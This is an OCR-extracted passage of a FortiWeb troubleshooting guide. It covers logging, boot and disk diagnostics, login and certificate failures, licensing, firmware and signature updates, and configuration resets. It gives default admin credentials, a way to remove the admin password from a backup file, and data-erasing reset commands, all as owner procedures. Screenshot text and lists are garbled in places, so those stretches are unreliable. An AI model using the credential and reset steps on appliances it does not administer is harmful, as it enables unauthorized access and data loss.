2 API Protection >
U DoS Protection >
& |P Protection >
S Tracking >
= Machine Learning >
@ Web Vulnerability Scan >
I\-m Log&Report v
Log Access v
Fuant

Attacks

Aggregated Attacks

2 | || % severity Level: ! Informative | @ AddFiter

x| SavedFilter~ &

# Date/Time Policy

2021/10/0411:52:14  SP_01
SP_01
SP.01

SP_O1

2021/10/0411:51:40
2021/10/04 11:46:56
2021/10/04 11:46:50
SP_O1
2021/10/0411:43:35 SP_01
2021/10/0411:42:52 SP_01
SP_01
SP_O1
SP.01

SP_O1

1
2
3
4
5 2021/10/0411:46:31
6
7
8  2021/10/0411:42:52
9 2021/10/0411:42:51
2021/10/0411:42:51
2021/10/0411:42:36
2021/10/0411:41:23  SP_01
2021/10/0411:41:23  SP_01
2021/10/0411:40:15 SP_01

2021/10/0411:40:14 SP_01

Source
141216.232.182.247
[+1216.232.182.247
523.95.222.129
1#1216.232.182.247
1#1216.232.182.247
1#1216.232.182.247
1#1216.232.182.247
141216.232.182.247
1#1216.232.182.247
141216.232.182.247
1#1216.232.182.247
1#1216.232.182.247
1#1216.232.182.247
1#1216.232.182.247
1#1216.232.182.247

Destination
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
104.40.29.86
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108
10.0.0.108

Threat Level
[EEEEEE
o)
)

Main Type
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
DoS Protection

HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure
HTTP Connection Failure

4. Avoid recording log messages using low log severity thresholds

SubType
N/A
N/A
N/A
N/A
N/A
HTTP Flood Prevention
N/A
N/A
N/A
NA
N/A
N/A
N/A
N/A
N/A

Using low log severity thresholds may cause several negative effects:

1. Frequentlocal hard disk writing thus likely cause premature failure.
2. Frequent disk I/O may also cause high CPU usage.
3. Ifsyslogs are configured to send to remote log servers, it may also cause heavy network traffic.

This principle applies to attack log, event log, and traffic log.

5. Log rate limit for Dos protection

b

Log Details

© Detailed Information
More Details

Flag

Date

Time

Policy

Service

HTTP Version

HTTP Host

Method

URL

Monitor Mode

Action

Threat Level

Client Risk

Source Country or Region
CVEID

OWASP Top10

Main Type

Sub Type

Signature Subclass Type
Signature ID

2021-10-04
11:51:40
SP_01
https/tls1.2
1x

none
none

none

Disabled

Alert_Deny

(]

© Unidentified

Canada

N/A

N/A

HTTP Connection Failure
N/A

N/A

N/A

essage

SSLError(258) - unsupported protocol |

When FortiWeb is defending your network against a DoS attack, log messages will likely be repetitive and
may actually be distracting from other unrelated attacks.

To optimize logging performance and help you to notice important new information, FortiWeb will only make
one log entry for these repetitive events in a specific time range. It will not log every occurrence, but only record
identical log messages during an ongoing attack.

FortiWeb # show full system advanced
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config system advanced
set max-dos-alert-interval 180 #default value
end

Type the maximum amount of time that FortiWeb will converge into a single log message during a DoS attack
or padding oracle attack.

How to check event logs in FortiWeb

Event logs display administrative events such as admin login/logout, system bootup and version upgrade, db
update, operation on configuration, hardware failures, etc.

One special useful log type is to filter “Action > Check-Resource”. This log does not only retain the CPU & Mem
usage abnormalities, but also record backend server status changes if health check for server-pool is ON.

Forwarding non-HTTP/HTTPS traffic

FAQ

Why is FortiWeb not forwarding non-HTTP traffic (for example, RDP, FTP) to
back-end servers even though set ip-forward is enabled?

The config router setting command allows you to change how FortiWeb handles non-HTTP/HTTPS traffic when
it is operating in Reverse Proxy mode.

When the setting ip-forward is enabled, for any non-HTTP/HTTPS traffic with a destination other than a
FortiWeb virtual server (for example, a back-end server), FortiWeb acts as a router and forwards it based in its
destination address.

However, any non-HTTP/HTTPS traffic destined for a virtual server on the appliance is dropped.

Therefore, if you require clients need to reach a back-end server using FTP or another non-HTTP/HTTPS
protocol, ensure the client uses the back-end server's IP address.

For more detailed information about this setting and a configuration that avoids this problem, see the “Router
setting” topic in the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

How to forward non-HTTP/HTTPS traffic

If FortiWeb is operating in Reverse Proxy mode, by default, it does not forward non HTTP/HTTPS protocols to
protected servers.

However, you can use the following command to enable IP-based forwarding (routing):

config router setting
set ip-forward {enable | disable}
end
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Diagnosing system issues

Sometimes the connectivity issues are caused by abnormal system resource usage, daemon coredump or
kernel coredump. This section provides tools and common methods to check system resources and analyze
these issues.

System boOot-UP iSSUES ... ... ... . . 40
System 10gin iSSUES ... .. 44
System license iSSUES ... .. ... 49
Firmware upgrade failures ... ... .. ... . 50
DB version&update info ... . 51
Resetting the configuration ... ... ... .. 54
Restoring firmware (“cleaninstall”) ......... ... ... 55
Checking System Resource Issues ... ... 57
Retrieving system&debug logs .................. . 67
Diagnose Crash & Coredump issues ... 74

System boot-up issues

While FortiWeb is booting up, hardware and firmware components must be present and functional, or startup
will fail. Depending on the degree of failure, FortiWeb may appear to be partially functional. You may notice that
you cannot connect at all. If you can connect, you may notice that features such as reports and anti-defacement
do not work. If you have enabled logging to an external location such as a Syslog server or FortiAnalyzer, or to
memory, you should notice this log message:

log disk not mounted

Depending on the cause of failure, you may be able to fix the problem.

Hard disk corruption or failure

FortiWeb appliances usually have multiple disks. FortiWeb stores its firmware (operating system) and
configuration files in a flash disk, but most models of FortiWeb also have an internal hard disk or RAID that is
used to store non-configuration/firmware data such as logs, reports, and website backups for anti-defacement.
During startup, after FortiWeb loads its boot loader, FortiWeb will attempt to mount its data disk. If this fails due
to errors, you will have the opportunity to attempt to recover the disk.

To determine if one of FortiWeb’s internal disks may either:
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« Have become corrupted
« Have experienced mechanical failure

view the event log. If the data disk failed to mount, you should see this log message:

date=2012-09-27 time=07:49:07 log 1d=00020006 msg_1id=000000000002 type=event
subtype="system" pri=alert device id=FV-1KC3R11700136 timezone="(GMT-5:00)Eastern
Time (US & Canada)" msg="log disk is not mounted"

Connect to FortiWeb’s CLI via local console, then supply power. After the boot loader starts, you should see this
prompt:

Press [enter] key for disk integrity verification.

Pressing the Enter key will cause FortiWeb to check the hard disk’s file system to attempt to resolve any
problems discovered with that disk’s file system, and to determine if the disk can be mounted (mounted disks
should appear in the internal list of mounted file systems, /etc/mtab). During the check, FortiWeb will describe
any problems that it finds, and the results of disk recovery attempts, such as:
ext2fs check if mount: Can’t detect if filesystem is mounted due to missing mtab
file while determining where /dev/sdal is mounted.

/dev/sdal: recovering journal
/dev/sdal: clean, 56/61054976 files, 3885759/244190638 blocks

If the problem occurs while FortiWeb is still running (or after an initial reboot and attempt to repair the file
system), in the CLI, enter:

diagnose hardware harddisk list
to display the number and names of mounted file systems.

For example, on a FortiWeb 1000C with a single properly functioning internal hard disk plus its internal flash
disk, this command should show two file systems:

name size (M)
sda 1000204.89
sdb 1971.32

where sda, the larger file system, is from the hard disk used to store non-configuration/firmware data.

If that command does not list the data disk’s file system, FortiWeb did not successfully mount it. Try to reboot
and run the file system check.

If the data disk’s file system is listed and appears to be the correct size, FortiWeb could mount it. However, there
still could be other problems preventing the file system from functioning, such as being mounted in read-only
mode, which would prevent new logs and other data from being recorded. To determine this, enter:

diagnose hardware logdisk info
to display the count, capacity, RAID status/level, partition numbers, and read-write/read-only mount status.

For example, on a FortiWeb-1000C with a single properly functioning data disk, this command should show:

disk number: 1

disk[0] size: 976.76GB
raid level: raidl
partition number: 1
mount status: read-write
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Vg . o . .
-~ - To prevent file system corruption in the future, and to prevent possible physical
9 damage, always make sure to shut down FortiWeb’s operating system before
L disconnecting the power.

You can also display the status of each individual disk in the RAID array:

FortiWeb # diag hardware raid list
disk-number size (M) level
0(OK),1(OK), 1877274 raidl

If the file system could not be fixed by the file system check, it may be physically damaged or components may
have worn out prematurely. Most commonly, this is caused by either:

Failing to shut down FortiWeb’s operating system before disconnecting the power (e.g. someone pulled the
power plug while FortiWeb was running)

Logging misconfiguration (e.g. logging very frequent logs like traffic logs or debug logs for an extended period of
time to the local hard drive)

For hardware replacement, contact Fortinet Customer Service & Support:

Power supply failure

If you have supplied power, but the power indicator LEDs are not lit and the hardware has not started, the power
supply may have failed. Contact Fortinet Customer Service & Support:

https://support.fortinet.com

After powering on, if the power indicator LEDs are lit but a few minutes have passed and you still cannot
connect to the FortiWeb appliance through the network using CLI or the web Ul, you can either:
« Restore the firmware. For details, see Restoring firmware (“clean install”) on page 55.
This usually solves most typically occurring issues.
« Verify that FortiWeb can successfully complete bootup.

Always halt the FortiWeb OS before disconnecting the power. Power
disruption while the OS is running can cause damage to the disks and/or
software.

To verify bootup, connect your computer directly to FortiWeb’s local console port, then on your computer, open
a terminal emulator such as PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html).
Configure it to log all printable console output to a file so that you have a copy of the console's output messages
in case you need to send it to Fortinet Customer Service & Support:

https://support.fortinet.com

Once connected, power cycle the appliance and observe the FortiWeb’s output to your terminal emulator. You
will be looking for some specific diagnostic indicators.

1. Are there console messages but text is garbled on the screen? If yes, verify your terminal emulator’s
settings are correct for your hardware. Typically, however, these are baud rate 9600, data bits 8, parity
none, stop bits 1.
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2. Does the hardware successfully complete the hardware power on self test (POST) and BIOS memory
tests?

If not, you may need to replace the hardware. For assistance, contact Fortinet Customer Service
& Support:

https://support.fortinet.com

3. Does the boot loader start? You should see a message such as:
FortiBootLoader

FortiWweb-1000C (17:52-09.08.2011)

Ver:00010018

Serial number:FV-1KC3R11700094

Total RAM: 3072MB

Boot up, boot device capacity: 1880MB.

Press any key to display configuration menu...

If the boot loader does not start, you may need to restore it. For assistance, contact Fortinet Customer
Service & Support:

https://support.fortinet.com

4. When pressing a key during the boot loader, do you see the following boot loader options?
: Get firmware image from TFTP server.
Format boot device.

Quit menu and continue to boot with default firmware.

T O WM Q

[
[
[
[
[

]
]
]: Boot with backup firmware and set as default.
]
]: Display this list of options.

Enter G,F,B,Q,or H:

Please connect TFTP server to Ethernet port "1".

If the boot loader does not start, you may need to restore it. For assistance, contact Fortinet Customer
Service & Support:

https://support.fortinet.com

5. Canthe boot loader read the image of the OS software in the selected boot partition (primary or
backup/secondary, depending on your selection in the boot loader)? You should see a message such as
the following:

Reading boot image 2479460 bytes.

Initializing FortiWeb...?
System is started.

If not, the image may be corrupted. Reboot and use the boot loader to switch to the other partition, if any.
For details, see "Booting from the alternate partition" on page 1.

If this is not possible, you can restore the firmware. If the firmware cannot be successfully restored, format
the boot partition, and try again. For details, see Restoring firmware (“clean install”) on page 55.

If you still cannot restore the firmware, there could be either a boot loader or disk issue. Contact Fortinet
Customer Service & Support:

https://support.fortinet.com

6. Does the login prompt appear? You should see a prompt like this:
FortiWeb login:

If not, or if the login prompt is interrupted by error messages, restore the OS software. If you recently
upgraded the firmware, try downgrading by restoring the previously installed, last known good, version.
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For details, see Restoring firmware (“clean install’) on page 55.
If restoring the firmware does not solve the problem, there could be a data or boot disk issue. Contact
Fortinet Customer Service & Support:
https://support.fortinet.com
If you can see and use the login prompt on the local console, but cannot successfully establish a session
through the network (web Ul, SSH or Telnet), first examine a backup copy of the configuration file to verify
that it is not caused by a misconfiguration. The network interface and administrator accounts must be
configured to allow your connection and login attempt. For details, see "Configuring the network settings"
on page 1 and Trusted Host #1 (page 1).
If the configuration appears correct, but no network connections are successful, first try restoring the
firmware to rule out corrupted data that could be causing problems. For details, see Restoring firmware
(“clean install”’) on page 55. You can also use this command to verify that resource exhaustion is not the
problem:

diagnose system top delay 5

The process system usage statistics continues to refresh and display in the CLI until you press g (quit).

System login issues

FAQ

How do | recover the password of the admin account?

If you forget the password of the admin administrator, you cannot recover it.

However, you can use the local console to reset the password. For details, see "Resetting passwords" in
FortiWeb Administration Guide.

Alternatively, you can reset the FortiWeb appliance to its default state (including the default administrator
account and password) by restoring the firmware. For details, see "Restoring firmware (“clean install”’)" in
FortiWeb Administration Guide.

Login common issues

If the person cannot access the login page at all, it is usually actually a connectivity issue (see "Configuring the
network settings" in FortiWeb Administration Guide) unless all accounts are configured to accept logins only
from specific IP addresses.

If an administrator can connect, but cannot log in, even though providing the correct account name and
password, and is receiving this error message:

Too many bad login attemptsor reached max number of logins. Please try again in a
few minutes. Login aborted.
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This may because the single administrator mode may have been enabled. For details, see "Enable Single
Admin User login" in FortiWeb Administration Guide.

When an administrator account cannot log in from a specific IP

If an administrator is entering his or her correct account name and password, but cannot log in from some or all
computers, examine that account’s trusted host definitions (see Trusted Host #1 (page 1)). It should include all
locations where that person is allowed to log in, such as your office, but should not be too broad.

Remote authentication query failures

If your network administrators’ or other accounts reside on an external server (e.g. Active Directory or RADIUS),
first switch the account to be locally defined on the FortiWeb appliance.

If the local account fails, correct connectivity between the client and appliance (see Login common issues on
page 44).

If the local account succeeds, troubleshoot connectivity between the appliance and your authentication server.

If routing exists but authentication still fails, you can verify correct vendor-specific attributes and other protocol-
specific fields by running a packet trace (see "Packet capture" on page 1).

WebUI authentication issues

When a local or remote administration account login fails, WebUI usually prompts an authentication failure
message.

Authentication failure. Please try again...

Possible causes:

« The local or remote administrator name exists, but the password is wrong;

« The remote administrator name exists on FortiWeb, but the remote server (User > Remote Server) is not
added into the corresponding Admin User Group; that is to say, the member in the selected group in User >
User Group > Admin Group is empty.

« The remote administrator name exists on FortiWeb, but the remote server added into the Admin User
Group is not reachable;

« The remote administrator name exists on FortiWeb, but does not exist on the remote server;

« Forremote users, you can capture packets on FortiWeb to see if auth query is sent to the remote server, or
check error logs on the remote server to find possible reasons;

« Forremote users, you can click the "Test LDAP", "Test Radius" or "Test TACACS+" button in User >
Remote Server > LDAP/Radius/TACACS+ Server to test if the remote user/administrator can be verified
successfully.

If the test fails, the Test page will display an error message that can help to make a quick judgment about the
possible cause. Possible Cause are listed as below.
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Radius Server:

Invalid credentials: Unsupported Authentication Scheme configured, or used incorrect username or
password to test;

Failed to receive RADIUS response: Unreachable server IP/Domain or port configured;
Bad response from RADIUS server: Incorrect Server Secret configured;

Radius server auth failed: Usually occurs when the remote user is set up with an OTP authentication but
the Test does not support doing OTP verification in a pop-up window at present. (e.g. FortiToken, Email,
EMS, etc.).

LDAP Server:

Failed to connect to LDAP server: Incorrect server IP / Domain or port configured;

Failed to search user DN: Incorrect Common Name Identifier, Distinguished Name or Filter configured;
or correct LDAP server configuration, but used an incorrect username to test;

Failed to bind LDAP server: Correct LDAP server configuration, but used an incorrect password (correct
username) to test;

Failed to login to LDAP server: Incorrect User DN or Password configured.

TACACS+ Server:

Invalid Credentials: Incorrect Server Secret configured; used an incorrect username or password to test,
or the remote user is set up with an OTP authentication (e.g. FortiToken, Email, EMS, etc.);

Server test error: Unreachable server IP/Domain configured.

remote user is set up on FortiAuthentication with an OTP authentication method such
as FortiToken, because OTP auth requires to input the challenge code but the Test
window does not support redirecting to a new window.

: The "Test LDAP", "Test Radius", or "Test TACACS+" button does not work when the

Invalid username or password

Possible causes:

The local administrator name does not exist on FWB.
The local or remote administrator name exists on FWB, but the password is incorrect.

Certificate-based WebUI login failure

FortiWeb supports the certificate-based authentication for administrators' Web Ul login. FortiWeb controls an
administrator's login by verifying its certificate if it connects to the Web Ul through HTTPS.

Common configuration flow for PKI user (Certificate based WebUI login)

P obh-=

FortiWeb Trouble-shooting Guide

Upload the CA's certificate of the administrator's certificate.
Create a PKl user.

Add the PKIl user to an Admin group.

Apply the Admin group to an administrator
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Certificate based WebUI Login Logic:

« Ifyou connect to the Web Ul through HTTPS, FortiWeb first verifies the certificate you provided.
« If your certificate is valid, then your access to Web Ul will be granted (the username/password login
page will not be displayed).
« Ifyou fail in the certificate authentication, you will be directed to the username/password login page.

« Ifyou connect to the Web Ul through HTTP, FortiWeb will only verify your access by the
username/password.

« You can configure FortiWeb to only apply the certificate-based authentication through the CLI as below.
Then If certification authentication fails, WebUI login will fail.
config system global
set admin-https-pki-required {enable | disable}
end

Login failure and troubleshootin

« Check if the browser prompts you to select a certificate when connecting to WebUI through HTTPS.
« Ifthe client certificate is not listed for selecting, you will need to check if it has been imported
successfully to the client system.

For example, on a Windows PC, you need to importa pfx/p12 format certificate instead of a

.cert/.der/.crt certificate, because the private key is required by Windows system, otherwise
you may import a .cer certificate successfully while cannot see it selectable when using the browser to
visit FortiWeb WebUI.

« If you can select the specific certificate while login still fails, FortiWeb will be redirected to the
username/password login page. (Refer to above section Certificate based WebUI Login Logic: )

« Check FortiWeb event logs to double confirm the login failure is caused by certificate authentication error:
When certificate authentication fails, an Event log will be generated as "Login failed! Check certificate error!
from GUI(172.30.212.60)"

As a comparison, below is the log when login succeeds:
User admuser logged in successfully from GUI->HTTPS(172.30.212.127)

« Follow below steps to do further troubleshooting:

« Ensure related configuration are added correctly by following the steps in the above section Common
configuration flow for PKI user (Certificate based WebUI login);

« Ensure the CA certificate is selected correctly;
« Ensure the Subject string is input correctly;
« If you have input multiple subject fields, try to leave only one or two and test again;
¢ On6.xand 7.0.1 builds, all Subject RDNs with the correct order are required:
E.g
C=CA, ST =BC, L =Burnaby, O = Fortinet, CN = 34B6A45C8 can be matched
CN = 34B6A45C8, C = CA, ST =BC, L =Burnaby, O = Fortinet cannot be matched
« On6.xand 7.0.1 builds, the type of RDNs are also case sensitive, while on later builds (schedule
in 7.0.2), the type is case insensitive, while the value is still case sensitive:
E.g
c=CA, t=BC, |=Burnaby, o = Fortinet, cn = 34B6A45C8 can be matched
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C =ca, ST =bc, L =burnaby, O = fortinet, CN = 34b6a45c8 cannot be matched
« For the type stateOrProvinceName, please input ST instead of just S.
« Use openssl command to verify if the CA and client certificate match:
This is a case for verification failure:

root@ubuntu:/# openssl verify -verbose -CAfile ca.crt Winl0.OA.cer
C = CA, ST = BC, L = Burnaby, O = Fortinet, CN = WinlO0.OA

error 18 at 0 depth lookup: self signed certificate

error Winl0.OA.cer: verification failed

« Test with a different pair of client & CA certificates; It's better to guarantee they work well on other
service environment.

Resetting passwords

If you forget the password, or want to change an account’s password, the admin administrator can reset the
password.

If you forget the password of the admin administrator, you can either:

« Login via other account with prof _admin permission only by CLI console.
« Remove the admin password from the backup configuration file by web UI.

To reset an account’s password

Log in as the admin administrator account to web Ul.

Go to System > Admin > Administrators.

Click the row to select the account whose password you want to change.

Click Change Password.

In the New Password and Confirm Password fields, type the new password.
Click OK.

The new password takes effect the next time that account logs in.

o ahwDd-=

To reset the admin account’s password

Option 1:
1. Connectto the CLI console with an account of prof admin permission.
2. Run the following commands:

config system admin
edit admin
set password a

end
Option 2:
1. Login to the web Ul with an account of prof admin permission.
2. Goto Maintenance > Backup & Restore > Backup.
3. Click Backup to download the backup file.
4. Decompress the .zip file, and open the FortiWeb_system.conf file with the editor. You are recommended

to use Notepad++.

5. Locatethe config system admincommand lines, remove the set password XxXline, and save the
file.

6. Go to Maintenance > Backup & Restore > Restore.
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7. Click Choose File to upload the updated backup file.
8. Click Restore.

System license issues

How do | upload and validate a license for FortiWeb-VM?

FortiWeb-VM includes a free 15-day trial license that includes all features except:

« High availability (HA)
« FortiGuard updates
« Technical support

Once the trial expires, most functionality is disabled. You need to purchase a license to continue using
FortiWeb-VM.

When you purchase a license for FortiWeb-VM, Fortinet Customer Service & Support
(https://support.fortinet.com) provides a license file that you can use to convert the trial license to a permanent,
paid license.

You can upload the license via the web Ul. The uploading process does not interrupt traffic or trigger an
appliance reboot.

FortiWeb-VM requires an Internet connection to periodically re-validate its
ﬂ license. It cannot be evaluated in offline, closed network environments. If
I FortiWeb-VM cannot contact Fortinet's FDN for 24 hours, it locks access to the
web Ul and CLI.

For detailed instructions for accessing the web Ul and uploading the license, see the FortiWeb-VM Install
Guide:

http://docs.fortinet.com/fortiweb/hardware

To upload the license

1. Gotothe FortiWeb-VM web Ul.
For hypervisor deployments, the URL is the default IP address of port1 of the virtual appliance, such as
https://192.168.1.99/.

For FortiWeb-VM deployed on AWS, the URL is the public DNS address displayed in the instance
information for the appliance in your AWS console.
2. Logintothe web Ul asthe admin user.
For hypervisor deployments, by default, the admin user does not use a password.
For AWS deployments, by default, the password is the AWS instance ID.

3. Goto System > Status > License. When you click the line “VM License”, the system will prompt “Update
VM License”, then you can upload the license file and wait for validation.

4. Afterthe new license is validated successfully, FortiGuard Information widget on System > Config >
FortiGuard in the web Ul will display detailed updated license information.
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5. Click Update.

6. Browse to the license file (. 11ic) you downloaded earlier from Fortinet, then click OK.
FortiWeb connects to Fortinet to validate its license. In most cases, the process is complete within a few
seconds. A message appears:

License has been uploaded. Please wait for authentication with registration
servers.

7. Inthe message box, click Refresh.
If you uploaded a valid license, the following message is displayed:

License has been successfully authenticated with registration servers.

The web Ul logs you out. The login dialog reappears.

8. Loginagain.

9. To verify that the license was uploaded successfully, log in to the web Ul again, then view the FortiGuard
Information widget. The VM License row should say Valid.
Also view the System Information widget. The Serial Number row should have a number that indicates
the maximum number of vCPUs that can be allocated according to the FortiWeb-VM software license, such
as FVVM020000003619 (where “YM02” indicates a limit of 2 vCPUs).

Firmware upgrade failures

How do | reformat the boot device (flash drive) when | restore or upgrade the
firmware?

Follow the instructions provided in "Restoring firmware (“clean install”)" in FortiWeb Administration Guide.
For Step 11, type F to format the boot device (flash drive), and then enter Y to confirm your selection.

After a few minutes, the reformatting process is complete. Continue with the instructions for retrieving the
firmware image from the TFTP server.

During the system boot, Fortinet highly recommends that you verify the disk integrity. To perform this task, when
the prompt Press [enter] key for disk integrity verification isdisplayed, press Enter.

After the firmware restore is complete, use the get system status CLIcommand to verify the system
version. For additional information on using the CLI, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

Troubleshooting firmware upgrade failures

If upgrade failed via GUI, check F12 to see which API causes the error;

Ifit's GUI timeout (request timeout), it should be a frontend issue;

Ifit's API timeout, it might be a backend system problem.

Check if uploading files to /var/log/gui_upload can be successful;

Check if upgrade via CLI can be successful;

Check if upgrade via a fast-speed link can be successful, especially when GUI warns timeout;

o ahwbhd-=
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7. Checkif hard disk space is enough for uploading image:

« GUIl upgrade: image will be uploaded to /var/log/cgi_upfile
« CLl upgrade: image will be uploaded to /tmp

DB version&update info

How to check detailed db versions and update information?

Check in System>Config>FortiGuard:

= |
@ Dashboard > =|| FortiGuard | Signature Update Management

b Network > FortiGuard Distribution Network
¥ System v
Firewall 4 License Information
Config Y Contract Status
Operation
Config-Synchronization Support Contract © Registered [ Launch Portal
SNMP Security Service @ Valid Contract (Expires 2022-09-09)
Replacement Message @® Signature Build Number: 0.00310
Advanced Antivirus @ Valid Contract (Expires 2022-09-09)

G tearation ® Regular Virus Database Version: 89.08605

FortiGuard
® Extended Virus Database Version: 89.08397

FortiSandbox
® Virus Engine Version: 6.00266
HSM
ICAP Server IP Reputation @ Valid Contract (Expires 2022-09-09) © Update
s eVl ® Signature Build Number: 4.00729 © How ToRenew
High Availability >
Admi Credential Stuffing Defense | @ Valid Contract (Expires 2022-09-09)
min >
X @® Credential Stuffing Defense Database Version: 1.00354
Maintenance >
S Security Fabric 5 FortiSandbox Cloud @ Valid Contract (Expires 2022-09-09)
& User 5 ® FortiSandbox Cloud Version: 0.0
B Policy > GEO DB & Valid Contract (Expires 2022-09-09)
£ Server Objects > ® GEO Database Version: 0110

2. Check current db version.

FortiWeb # get sys upd-db-version

Regular Virus Database Version: 00089.04670

Extended Virus Database Version: 00089.04220

Virus Engine Version: 00006.00137

Waf Signature Version: 00000.00300

IP Intelligence Signature Version: 00004.00713

Credential Stuffing Defense Database Version: 00001.00339
FortiSandbox Malware Signature Database Version: 0.0

Geo Database Version: Fortiweb-Country-Build0094 2021-09-09

Update db version for a module or all
FortiWeb appliances connect to the FDN by connecting to the FDS nearest to the FortiWeb appliance by its
configured time zone.

FortiWeb # execute update #update for a specific module
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av update antivirus

base update contract, timezone and fds server list

fwdb update fortiweb signature (include geodb)

hcdb update credential stuffing defense

irdb update ip reputation

FortiWeb # execute update-now #update all modules using db

4. Check the detailed db version & update information for all modules:
FortiWeb # diagnose system update info
FortiWeb signature
Version: 0.00300
Expiry Date: Fri Sep 09 2022
Last Update Date: Thu Sep 30 12:00:18 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions
0.00299
0.00271

FortiWeb GEODB

Version: Fortiweb-Country-Build0094 2021-09-09
Expiry Date: Fri Sep 09 2022

Last Update Date: Thu Sep 30 11:47:07 2021
Next Update Date: Thu Sep 30 14:00:00 2021
Historical versions

Fortiweb-Country-Build0090 2021-08-05

Regular Antivirus

Version: 89.04670

Expiry Date: Fri Sep 09 2022

Last Update Date: Thu Sep 30 12:00:20 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions

89.04650

Extended Antivirus

Version: 89.04220

Expiry Date: Fri Sep 09 2022

Last Update Date: Thu Sep 30 12:00:20 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions

89.02540
89.01110

Antivirus Engine

Version: 6.00137
Expiry Date: Fri Sep 09 2022
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Last Update Date: Thu Sep 30 12:00:20 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions

Version: 4.00713

Expiry Date: Fri Sep 09 2022

Last Update Date: Thu Sep 30 12:00:18 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions
4.00712
4.00711

Harvest Credentials

Version: 1.00339

Expiry Date: Fri Sep 09 2022

Last Update Date: Thu Sep 30 12:00:18 2021
Next Update Date: Thu Sep 30 14:00:00 2021

Historical versions
1.00338
1.00337

FortiSandbox Malware Signature Database
Version: 0.0

Expiry Date: Fri Sep 09 2022

Last Update Date: Wed Dec 31 18:00:00 1969
Next Update Date: Thu Sep 30 14:00:00 2021

Latest errors

Mon Sep 27 18:01:19 2021 Failed to receive essential/anti-virus packages from
209.222.136.6:443.

Fri Sep 24 06:01:19 2021 Failed to receive essential/anti-virus packages from
173.243.138.66:443.

Thu Sep 23 21:39:34 2021 update network error:failed to connect servers.

Thu Sep 23 21:39:33 2021 update network error:failed to connect servers.

Fortisandbox connectivity
FortiSandbox DOMAIN
FortiSandbox IP
FortiSandbox port : 51
FortiSandbox connect type : Appliance

o O O
~ o o
o o
o o

FortiSandbox connect state: Disconnected
FortiSandbox connect info : Fail to build FortiSandbox connection.
FortiSandbox connect ssl
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Why did the FortiGuard service update fail?

If your automatic FortiGuard service update is not successful, complete the following troubleshooting steps:

1. Ensure that your firewall rules allow FortiWeb to access the Internet via TCP port 443.

This is the port that FortiWeb uses to poll for and download FortiGuard service updates from the FortiGuard
Distribution Network (FDN).

2. Ensure FortiWeb can communicate with the DNS server.

When it performs the initial FortiGuard service update, FortiWeb requires access to the DNS server to
resolve the domain name fds.fortinet.com tothe appropriate host name.

3. Because the size of the virus signature database exceeds 200MB, an unstable network can interrupt the
TCP session that downloads the database. If the download fails for this reason, obtain the latest version of
the virus signature database from support.fortinet.com and perform the update manually. For
details, see "Uploading signature & geography-to-IP updates" in FortiWeb Administration Guide.

FortiWeb resumes automatic updates of the database at the next scheduled time.

4. If the previous steps do not solve the problem, use the following commands to obtain additional

information:

diagnose debug enable
diagnose debug application fds 7

If you need to contact Fortinet Technical Support for assistance, provide the output of these diagnose
debug commands and a configuration file.

For more information about these commands, see the FortiWeb CLI Reference:
https://docs.fortinet.com/product/fortiweb/

For additional methods for verifying FortiGuard connectivity, see "Connecting to FortiGuard services" in
Fortiweb Administration Guide.

Resetting the configuration

If you will be selling your FortiWeb appliance, or if you are not sure what part of your configuration is causing a
problem, you can reset it to its default settings and erase data. If you have not updated the firmware, this is the
same as resetting to the factory default settings.

Back up your configuration before beginning this procedure, if possible.
Resetting the configuration could include the IP addresses of network
interfaces. For details about backups, see "Backups" on page 1. For details
about reconnecting to a FortiWeb appliance whose network interface
configuration was reset, see "Connecting to the web Ul or CLI" on page 1.

To delete your data from the appliance, connect to the CLI and enter this command:

execute formatlogdisk

To reset the appliance’s configuration, connect to the CLI and enter this command:

execute factoryreset
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\‘é', Alternatively, you can reset the appliance’s configuration to its default values

for a specific software version by restoring the firmware during a reboot (a
“clean install”). For details, see Restoring firmware (“clean install”’) on page 55.

Restoring firmware (“clean install”)

Restoring (also called re-imaging) the firmware can be useful if:

« You are unable to connect to the FortiWWeb appliance using the web Ul or the CLI

« You want to install firmware without preserving any existing configuration (i.e. a “clean install”)

« Afirmware version that you want to install requires a different size of system partition (see the Release
Notes accompanying the firmware)

« Afirmware version that you want to install requires that you format the boot device (see the Release Notes
accompanying the firmware)

Unlike updating firmware, restoring firmware re-images the boot device, including the signatures that were
current at the time that the firmware image file was created. Also, restoring firmware can only be done during a
boot interrupt, before network connectivity is available, and therefore requires a local console connection to
the CLI. It cannot be done through an SSH or Telnet connection.

Alternatively, if you cannot physically access the appliance’s local console connection, connect the appliance’s
local console port to a terminal server to which you have network access. Once you have used a client to
connect to the terminal server over the network, you will be able to use the appliance’s local console through it.
However, be aware that from a remote location, you may not be able to power cycle the appliance if
abnormalities occur.

To restore the firmware

Back up your configuration before beginning this procedure, if possible.
Restoring firmware resets the configuration, including the IP addresses of
network interfaces. For details about backups, see "Backups" on page 1. For
details about reconnecting to a FortiWeb appliance whose network interface
configuration was reset, see "Connecting to the web Ul or CLI" on page 1.

1. Download the firmware file from the Fortinet Customer Service & Support website:
https://support.fortinet.com/

2. Connect your management computer to the FortiWeb console port using a RJ-45-to-DB-9 serial cable or a
null-modem cable.

3. Initiate a local console connection from your management computer to the CLI of the FortiWeb
appliance, and log in as the admin administrator, or an administrator account whose access profile
contains Read and Write permissions in the Maintenance category.

For details, see "Connecting to the web Ul or CLI" on page 1.
4. Connect port1 of the FortiWeb appliance directly or to the same subnet as a TFTP server.
Copy the new firmware image file to the root directory of the TFTP server.

6. If necessary, start your TFTP server. If you do not have one, you can temporarily install and run one such
as tftpd on your management computer.

o
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10.

1.

12,

13.

14,

15.
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Because TFTP is not secure, and because it does not support
